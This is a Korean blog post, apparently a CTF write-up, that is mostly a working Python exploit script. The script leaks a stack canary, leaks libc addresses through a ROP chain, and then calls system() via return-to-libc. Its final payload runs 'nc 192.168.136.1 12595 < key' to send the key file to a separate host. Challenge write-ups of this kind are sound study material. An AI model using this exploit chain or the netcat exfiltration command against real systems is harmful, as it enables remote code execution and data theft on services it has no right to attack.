처음에 볼땐 환경구축에 필요한 게 참 많길래 어려운 문젠가 싶었으나 오히려 Nuclear보다 쉽게 풀었다.
이번에는 쉘따려고 고생하지 않고 바로 key를 출력하도록 했다.
푸는데 걸린 시간 약 2시간 반...?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 | from hackutil import * from socket import * from time import * HOST = '192.168.136.139' PORT = 8888 #============================================== pppr = 0x08048b2c ppppr = 0x080495bc read_plt = 0x08048620 read_got = 0x0804B010 write_plt = 0x080486E0 write_got = 0x0804B040 libc_main_got = 0x0804B038 offset_read_system = 0x9aa40 binsh = 0x0804970D bss = 0x0804b080 #============================================== banner() print "===================[ Phase 1 : Canary leak ]==================" s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) sleep(2) s.recv(1024) s.send('4') sleep(0.2) s.recv(1024) payload = 'y'*11 s.send(payload) sleep(0.1) data = s.recv(1024) canary = up32(data[22:26])[0] & 0xFFFFFF00 print "[*] Found Canary : "+hex(canary) s.close() print "==================[ Phase 2 : Library leak ]==================" s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) sleep(2) s.recv(1024) s.send('4') sleep(0.2) s.recv(1024) payload2 = 'y'*10 + p32(canary) + 'A'*12 payload2 += p32(write_plt) + p32(pppr) + p32(4) + p32(read_got) + p32(4) payload2 += p32(write_plt) + p32(pppr) + p32(4) + p32(libc_main_got) + p32(4) s.send(payload2) sleep(0.1) data = s.recv(1024) read_lib = up32(data[0:4])[0] libc_main_lib = up32(data[4:8])[0] system_lib = read_lib - offset_read_system print "[*] Found read_lib : "+hex(read_lib) print "[*] Found libc_main_lib : "+hex(libc_main_lib) print "[*] Found system_lib : "+hex(system_lib) print '[*] &"/bin/sh" : '+hex(binsh) s.close() print "================[ Phase 3 : Attack with RTL ]=================" s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) sleep(2) s.recv(1024) s.send('4') sleep(0.2) s.recv(1024) payload3 = 'y'*10 + p32(canary) + 'A'*12 payload3 += p32(read_plt) + p32(pppr) + p32(4) + p32(bss) + p32(0x100) payload3 += p32(system_lib) + "AAAA" + p32(bss) s.send(payload3) sleep(0.1) s.send('nc 192.168.136.1 12595 < key') sleep(0.1) s.close() print "==================[ Phase 4 : Got the Key ]===================" | cs |
'CTF > 지난 대회' 카테고리의 다른 글
| Layer7 CTF 2015 - Spil..Spli....SPPPPPIILL (0) | 2015.11.03 |
|---|---|
| Codegate 2013 Prequal - vuln 100 (0) | 2015.10.30 |
| PlaidCTF 2013 - pork (0) | 2015.10.29 |
| Plaid CTF 2013 - ropasaurusrex (0) | 2015.10.22 |
| Codegate Junior 2014 Prequal - nuclear (0) | 2015.10.22 |
__미니__
E-mail : skyclad0x7b7@gmail.com 나와 계약해서 슈퍼 하-카가 되어 주지 않을래?